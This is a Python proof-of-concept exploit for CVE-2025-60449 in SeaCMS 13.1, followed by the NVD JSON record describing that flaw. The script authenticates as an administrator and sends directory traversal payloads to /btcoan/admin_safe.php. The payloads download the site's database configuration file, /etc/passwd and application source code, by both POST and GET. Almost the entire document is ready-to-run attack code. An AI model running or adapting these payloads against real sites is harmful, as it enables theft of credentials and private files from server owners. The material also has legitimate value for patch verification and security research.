CVE-2025-60449

# CVE-2025-60449 PoC - SeaCMS 13.1 Information Disclosure # Vulnerability: Arbitrary File Download via admin_safe.php in /btcoan/ # Requires authenticated admin credentials import requests # Target configuration TARGET_URL = "http://target-seacms-site.com" ADMIN_USERNAME = "admin" ADMIN_PASSWORD = "admin_password" # Step 1: Login as administrator to obtain session cookie session = requests.Session() login_url = f"{TARGET_URL}/admin/login.php" login_data = { "username": ADMIN_USERNAME, "password": ADMIN_PASSWORD, "submit": "submit" } response = session.post(login_url, data=login_data) print(f"[*] Login response status: {response.status_code}") # Step 2: Exploit the arbitrary file download vulnerability # The vulnerable endpoint is admin_safe.php in /btcoan/ directory vuln_url = f"{TARGET_URL}/btcoan/admin_safe.php" # Craft payload to traverse directories and read sensitive files # Example: Download the application's configuration file payloads = [ # Read SeaCMS database configuration {"action": "download", "filename": "../../../include/config.inc.php"}, # Read system passwd file {"action": "download", "filename": "../../../../../../etc/passwd"}, # Read source code files {"action": "download", "filename": "../admin/index.php"}, ] for payload in payloads: print(f"[*] Attempting to download: {payload['filename']}") response = session.post(vuln_url, data=payload) if response.status_code == 200 and len(response.content) > 0: print(f"[+] Successfully downloaded file content:") print(response.text[:500]) print("---") else: print(f"[-] Failed to download file") # Alternative GET-based exploitation vuln_url_get = f"{TARGET_URL}/btcoan/admin_safe.php?action=download&filename=../../../include/config.inc.php" response = session.get(vuln_url_get) print(f"[*] GET-based exploit response: {response.status_code}") if response.status_code == 200: print(f"[+] File content leaked:") print(response.text[:1000])

{"cve": {"id": "CVE-2025-60449", "sourceIdentifier": "[email protected]", "published": "2025-10-03T14:15:46.407", "lastModified": "2025-10-08T15:20:55.803", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An information disclosure vulnerability has been discovered in SeaCMS 13.1. The vulnerability exists in the admin_safe.php component located in the /btcoan/ directory. This security flaw allows authenticated administrators to scan and download not only the application’s source code but also potentially any file accessible on the server’s root directory."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:seacms:seacms:13.1:*:*:*:*:*:*:*", "matchCriteriaId": "6FD99F78-3066-4826-96DA-6F8466EDB1B7"}]}]}], "references": [{"url": "https://snowhy77.github.io/2025/08/21/Information-Disclosure-Vulnerability-in-SeaCMS/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}